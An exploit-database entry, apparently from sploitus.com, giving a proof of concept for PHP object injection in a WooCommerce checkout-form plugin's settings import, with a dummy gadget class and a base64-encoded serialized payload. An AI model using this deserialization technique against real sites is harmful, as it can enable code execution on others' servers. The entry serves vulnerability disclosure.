## https://sploitus.com/exploit?id=WPEX-ID:0C9F22E0-1D46-4957-9BA5-5CCA78861136
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then import the following payload via WooCommerce > Checkout Form > Advanced Settings > Backup and Import Settings: Tzo0OiJFdmlsIjowOnt9Ow==
Tzo0OiJFdmlsIjowOnt9Ow== being the base64 encode of serialized object: O:4:"Evil":0:{};